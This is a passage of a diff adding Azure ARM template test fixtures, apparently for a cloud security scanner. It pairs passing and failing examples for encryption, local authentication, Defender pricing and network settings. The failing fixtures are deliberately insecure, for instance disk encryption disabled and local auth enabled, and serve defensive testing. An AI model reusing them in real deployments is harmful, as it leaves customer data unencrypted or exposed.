b/tests/arm/checks/resource/example_AutomationEncrypted/fail.json @@ -0,0 +1,22 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.Automation/automationAccounts/variables", + "apiVersion": "2020-01-13-preview", + "name": "fail", + "properties": { + "name": "tfex-example-var", + "value": "Hello, Arm Basic Test.", + "isEncrypted": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Automation/automationAccounts', 'example')]" + ] + } + ], + "outputs": {} +} diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json new file mode 100644 index 00000000000..b416528b505 --- /dev/null +++ b/tests/arm/checks/resource/example_AutomationEncrypted/fail1.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.Automation/automationAccounts/variables", + "apiVersion": "2020-01-13-preview", + "name": "fail1", + "properties": { + "name": "tfex-example-var", + "value": "Hello, Arm Basic Test." + }, + "dependsOn": [ + "[resourceId('Microsoft.Automation/automationAccounts', 'example')]" + ] + } + ], + "outputs": {} +} diff --git a/tests/arm/checks/resource/example_AutomationEncrypted/pass.json b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json new file mode 100644 index 00000000000..cca3b5d5366 --- /dev/null +++ b/tests/arm/checks/resource/example_AutomationEncrypted/pass.json @@ -0,0 +1,22 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": {}, + "variables": {}, + "resources": [ + { + "type": "Microsoft.Automation/automationAccounts/variables", + "apiVersion": "2020-01-13-preview", + "name": "pass", + "properties": { + "name": "tfex-example-var", + "value": "Hello, Arm Basic Test.", + "isEncrypted": true + }, + "dependsOn": [ + "[resourceId('Microsoft.Automation/automationAccounts', 'example')]" + ] + } + ], + "outputs": {} +} diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json new file mode 100644 index 00000000000..9336aeba462 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/fail.json @@ -0,0 +1,106 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "fail", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + } + + }, + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json new file mode 100644 index 00000000000..e0cf6278352 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureBatchAccountUsesKeyVaultEncryption/pass.json @@ -0,0 +1,109 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.26.54.24096", + "templateHash": "5620168434409602803" + } + }, + "parameters": { + "batchAccountName": { + "type": "string", + "defaultValue": "[format('{0}batch', toLower(uniqueString(resourceGroup().id)))]", + "metadata": { + "description": "Batch Account Name" + } + }, + "storageAccountsku": { + "type": "string", + "defaultValue": "Standard_LRS", + "allowedValues": [ + "Standard_LRS", + "Standard_GRS", + "Standard_ZRS", + "Premium_LRS" + ], + "metadata": { + "description": "Storage Account type" + } + }, + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources." + } + } + }, + "variables": { + "storageAccountName": "[format('{0}storage', uniqueString(resourceGroup().id))]" + }, + "resources": [ + { + "type": "Microsoft.Storage/storageAccounts", + "apiVersion": "2023-01-01", + "name": "[variables('storageAccountName')]", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('storageAccountsku')]" + }, + "kind": "StorageV2", + "tags": { + "ObjectName": "[variables('storageAccountName')]" + }, + "properties": { + "minimumTlsVersion": "TLS1_2", + "allowBlobPublicAccess": false, + "networkAcls": { + "defaultAction": "Deny" + }, + "supportsHttpsTrafficOnly": true + } + }, + { + "type": "Microsoft.Batch/batchAccounts", + "apiVersion": "2024-02-01", + "name": "pass", + "location": "[parameters('location')]", + "tags": { + "ObjectName": "[parameters('batchAccountName')]" + }, + "properties": { + "autoStorage": { + "storageAccountId": "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + }, + "keyVaultReference": { + "id": "test", + "url": "https://test.com" + } + }, + "dependsOn": [ + "[resourceId('Microsoft.Storage/storageAccounts', variables('storageAccountName'))]" + ] + } + ], + "outputs": { + "storageAccountName": { + "type": "string", + "value": "[variables('storageAccountName')]" + }, + "batchAccountName": { + "type": "string", + "value": "[parameters('batchAccountName')]" + }, + "location": { + "type": "string", + "value": "[parameters('location')]" + }, + "resourceGroupName": { + "type": "string", + "value": "[resourceGroup().name]" + }, + "resourceId": { + "type": "string", + "value": "[resourceId('Microsoft.Batch/batchAccounts', parameters('batchAccountName'))]" + } + } +} diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json new file mode 100644 index 00000000000..d75a866210a --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/fail.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Security/pricings", + "apiVersion": "2018-06-01", + "name": "fail", + "properties": { + "pricingTier": "Free", + "resourceType": "Microsoft.Security/pricings" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json new file mode 100644 index 00000000000..e7cf4f13566 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureDefenderOnStorage/pass.json @@ -0,0 +1,15 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.Security/pricings", + "apiVersion": "2018-06-01", + "name": "pass", + "properties": { + "pricingTier": "Standard", + "resourceType": "Microsoft.Security/pricings" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json new file mode 100644 index 00000000000..4e30ed5ab84 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "fail1", + "location": "West US", + "properties": { + "managedNetwork": { + "outboundRules": { + "rule1": { + "type": "PrivateEndpoint" + } + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json new file mode 100644 index 00000000000..934ab52654d --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/fail2.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "fail2", + "location": "West US", + "properties": { + "managedNetwork": { + "outboundRules": { + "rule1": { + "type": "ServiceTag" + }, + "rule2": { + "type": "PrivateEndpoint" + } + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json new file mode 100644 index 00000000000..dcd9c4761a5 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass.json @@ -0,0 +1,21 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass1", + "location": "West US", + "properties": { + "managedNetwork": { + "outboundRules": { + "rule1": { + "type": "ServiceTag" + } + } + } + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json new file mode 100644 index 00000000000..58a530a81b0 --- /dev/null +++ b/tests/arm/checks/resource/example_AzureMLWorkspacePrivateEndpoint/pass2.json @@ -0,0 +1,16 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "resources": [ + { + "type": "Microsoft.MachineLearningServices/workspaces", + "apiVersion": "2022-12-01", + "name": "pass2", + "location": "West US", + "properties": { + "description": "No netowks" + + } + } + ] + } \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json new file mode 100644 index 00000000000..4fbba1f7504 --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/fail.json @@ -0,0 +1,33 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "apiVersion": "2023-05-01", + "name": "fail", + "location": "westeurope", + "tags": { + "createby": "Terraform" + }, + "sku": { + "name": "S0" + }, + "kind": "Face", + "properties": { + "publicNetworkAccess": "Enabled", + "restrictOutboundNetworkAccess": false, + "allowedFqdnList": [], + "disableLocalAuth": false, + "dynamicThrottlingEnabled": false + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json new file mode 100644 index 00000000000..90441225f09 --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesConfigureIdentity/pass.json @@ -0,0 +1,36 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "apiVersion": "2023-05-01", + "name": "pass", + "location": "westeurope", + "tags": { + "createby": "Terraform" + }, + "sku": { + "name": "S0" + }, + "kind": "Face", + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "publicNetworkAccess": "Disabled", + "restrictOutboundNetworkAccess": false, + "allowedFqdnList": [], + "disableLocalAuth": false, + "dynamicThrottlingEnabled": false + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json new file mode 100644 index 00000000000..8f1a46d325f --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "fail", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled", + "disableLocalAuth": false + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json new file mode 100644 index 00000000000..95abec6ec32 --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/fail2.json @@ -0,0 +1,25 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "fail2", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled" + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json new file mode 100644 index 00000000000..90f828d966f --- /dev/null +++ b/tests/arm/checks/resource/example_CognitiveServicesEnableLocalAuth/pass.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2023-05-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "parameters": { + "accounts_pike_name": { + "defaultValue": "pike", + "type": "String" + } + }, + "variables": {}, + "resources": [ + { + "type": "Microsoft.CognitiveServices/accounts", + "name": "pass", + "location": "West US", + "sku": { + "name": "S0" + }, + "kind": "CognitiveServices", + "properties": { + "publicNetworkAccess": "Enabled", + "disableLocalAuth": true + } + } + ] +} \ No newline at end of file diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json new file mode 100644 index 00000000000..da1b0618d29 --- /dev/null +++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/fail.json @@ -0,0 +1,186 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "11556612112757819680" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources" + } + }, + "clusterName": { + "type": "string", + "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of the cluster" + } + }, + "skuName": { + "type": "string", + "defaultValue": "Standard_D12_v2", + "metadata": { + "description": "Name of the sku" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "maxValue": 1000, + "minValue": 2, + "metadata": { + "description": "# of nodes" + } + }, + "databaseName": { + "type": "string", + "defaultValue": "kustodb", + "metadata": { + "description": "Name of the database" + } + }, + "eventHubNamespaceName": { + "type": "string", + "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of Event Hub's namespace" + } + }, + "eventHubName": { + "type": "string", + "defaultValue": "kustoHub", + "metadata": { + "description": "Name of Event Hub" + } + } + }, + "variables": { + "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde", + "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]", + "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]", + "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventHub/namespaces/eventhubs/consumergroups", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "properties": {}, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces/eventhubs", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "properties": { + "messageRetentionInDays": 2, + "partitionCount": 2 + }, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/scripts", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]", + "properties": { + "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"", + "continueOnErrors": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/dataConnections", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]", + "location": "[parameters('location')]", + "kind": "EventHub", + "properties": { + "compression": "None", + "consumerGroup": "kustoConsumerGroup", + "dataFormat": "MULTIJSON", + "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "eventSystemProperties": [ + "x-opt-enqueued-time" + ], + "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "mappingRuleName": "DirectJson", + "tableName": "RawEvents" + }, + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]", + "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]", + "location": "[parameters('location')]", + "kind": "ReadWrite", + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces", + "apiVersion": "2021-11-01", + "name": "[parameters('eventHubNamespaceName')]", + "location": "[parameters('location')]", + "sku": { + "capacity": 1, + "name": "Standard", + "tier": "Standard" + }, + "properties": {} + }, + { + "type": "Microsoft.Kusto/clusters", + "apiVersion": "2022-02-01", + "name": "fail", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('skuCapacity')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableDiskEncryption":false + } + }, + { + "type": "Microsoft.Authorization/roleAssignments", + "apiVersion": "2021-04-01-preview", + "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "name": "[variables('roleAssignmentName')]", + "properties": { + "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster", + "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]", + "principalType": "ServicePrincipal", + "roleDefinitionId": "[variables('fullDataReceiverId')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json new file mode 100644 index 00000000000..a86aa7945a7 --- /dev/null +++ b/tests/arm/checks/resource/example_DataExplorerUsesDiskEncryption/pass.json @@ -0,0 +1,186 @@ +{ + "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#", + "contentVersion": "1.0.0.0", + "metadata": { + "_generator": { + "name": "bicep", + "version": "0.5.6.12127", + "templateHash": "11556612112757819680" + } + }, + "parameters": { + "location": { + "type": "string", + "defaultValue": "[resourceGroup().location]", + "metadata": { + "description": "Location for all resources" + } + }, + "clusterName": { + "type": "string", + "defaultValue": "[format('kusto{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of the cluster" + } + }, + "skuName": { + "type": "string", + "defaultValue": "Standard_D12_v2", + "metadata": { + "description": "Name of the sku" + } + }, + "skuCapacity": { + "type": "int", + "defaultValue": 2, + "maxValue": 1000, + "minValue": 2, + "metadata": { + "description": "# of nodes" + } + }, + "databaseName": { + "type": "string", + "defaultValue": "kustodb", + "metadata": { + "description": "Name of the database" + } + }, + "eventHubNamespaceName": { + "type": "string", + "defaultValue": "[format('eventHub{0}', uniqueString(resourceGroup().id))]", + "metadata": { + "description": "Name of Event Hub's namespace" + } + }, + "eventHubName": { + "type": "string", + "defaultValue": "kustoHub", + "metadata": { + "description": "Name of Event Hub" + } + } + }, + "variables": { + "dataReceiverId": "a638d3c7-ab3a-418d-83e6-5f17a39d4fde", + "fullDataReceiverId": "[subscriptionResourceId('Microsoft.Authorization/roleDefinitions', variables('dataReceiverId'))]", + "eventHubRoleAssignmentName": "[format('{0}{1}{2}{3}', resourceGroup().id, parameters('clusterName'), variables('dataReceiverId'), parameters('eventHubName'))]", + "roleAssignmentName": "[guid(variables('eventHubRoleAssignmentName'), parameters('eventHubName'), variables('dataReceiverId'), parameters('clusterName'))]" + }, + "resources": [ + { + "type": "Microsoft.EventHub/namespaces/eventhubs/consumergroups", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}/{2}', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "properties": {}, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces/eventhubs", + "apiVersion": "2021-11-01", + "name": "[format('{0}/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "properties": { + "messageRetentionInDays": 2, + "partitionCount": 2 + }, + "dependsOn": [ + "[resourceId('Microsoft.EventHub/namespaces', parameters('eventHubNamespaceName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/scripts", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'db-script')]", + "properties": { + "scriptContent": "// Create a landing table for Event Hub's events\n.create-merge table RawEvents(document:dynamic)\n\n// Create mapping from JSON ingestion to landing table\n.create-or-alter table RawEvents ingestion json mapping 'DirectJson' '[{\"column\":\"document\",\"path\":\"$\",\"datatype\":\"dynamic\"}]'\n\n// We modify the ingestion batching policy to make it easy to see records coming ingestion\n// THIS CONFIGURATION SHOULDN'T BE USED IN PRODUCTION: MaximumBatchingTimeSpan SHOULD BE AT LEAST 1 MINUTE\n.alter table RawEvents policy ingestionbatching \"{'MaximumBatchingTimeSpan': '0:0:10', 'MaximumNumberOfItems': 10000}\"", + "continueOnErrors": false + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases/dataConnections", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}/{2}', parameters('clusterName'), parameters('databaseName'), 'eventConnection')]", + "location": "[parameters('location')]", + "kind": "EventHub", + "properties": { + "compression": "None", + "consumerGroup": "kustoConsumerGroup", + "dataFormat": "MULTIJSON", + "eventHubResourceId": "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "eventSystemProperties": [ + "x-opt-enqueued-time" + ], + "managedIdentityResourceId": "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "mappingRuleName": "DirectJson", + "tableName": "RawEvents" + }, + "dependsOn": [ + "[extensionResourceId(resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName')), 'Microsoft.Authorization/roleAssignments', variables('roleAssignmentName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs/consumergroups', parameters('eventHubNamespaceName'), parameters('eventHubName'), 'kustoConsumerGroup')]", + "[resourceId('Microsoft.Kusto/clusters/databases', parameters('clusterName'), parameters('databaseName'))]", + "[resourceId('Microsoft.Kusto/clusters/databases/scripts', parameters('clusterName'), parameters('databaseName'), 'db-script')]" + ] + }, + { + "type": "Microsoft.Kusto/clusters/databases", + "apiVersion": "2022-02-01", + "name": "[format('{0}/{1}', parameters('clusterName'), parameters('databaseName'))]", + "location": "[parameters('location')]", + "kind": "ReadWrite", + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]" + ] + }, + { + "type": "Microsoft.EventHub/namespaces", + "apiVersion": "2021-11-01", + "name": "[parameters('eventHubNamespaceName')]", + "location": "[parameters('location')]", + "sku": { + "capacity": 1, + "name": "Standard", + "tier": "Standard" + }, + "properties": {} + }, + { + "type": "Microsoft.Kusto/clusters", + "apiVersion": "2022-02-01", + "name": "pass", + "location": "[parameters('location')]", + "sku": { + "name": "[parameters('skuName')]", + "tier": "Standard", + "capacity": "[parameters('skuCapacity')]" + }, + "identity": { + "type": "SystemAssigned" + }, + "properties": { + "enableDiskEncryption":true + } + }, + { + "type": "Microsoft.Authorization/roleAssignments", + "apiVersion": "2021-04-01-preview", + "scope": "[format('Microsoft.EventHub/namespaces/{0}/eventhubs/{1}', parameters('eventHubNamespaceName'), parameters('eventHubName'))]", + "name": "[variables('roleAssignmentName')]", + "properties": { + "description": "Give \"Azure Event Hubs Data Receiver\" to the cluster", + "principalId": "[reference(resourceId('Microsoft.Kusto/clusters', parameters('clusterName')), '2022-02-01', 'full').identity.principalId]", + "principalType": "ServicePrincipal", + "roleDefinitionId": "[variables('fullDataReceiverId')]" + }, + "dependsOn": [ + "[resourceId('Microsoft.Kusto/clusters', parameters('clusterName'))]", + "[resourceId('Microsoft.EventHub/namespaces/eventhubs', parameters('eventHubNamespaceName'), parameters('eventHubName'))]" + ] + } + ] +} diff --git a/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json b/tests/arm/checks/resource/example_DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey/fail.json new file mode 100644 index 00000000000..b8ca21f4a5b 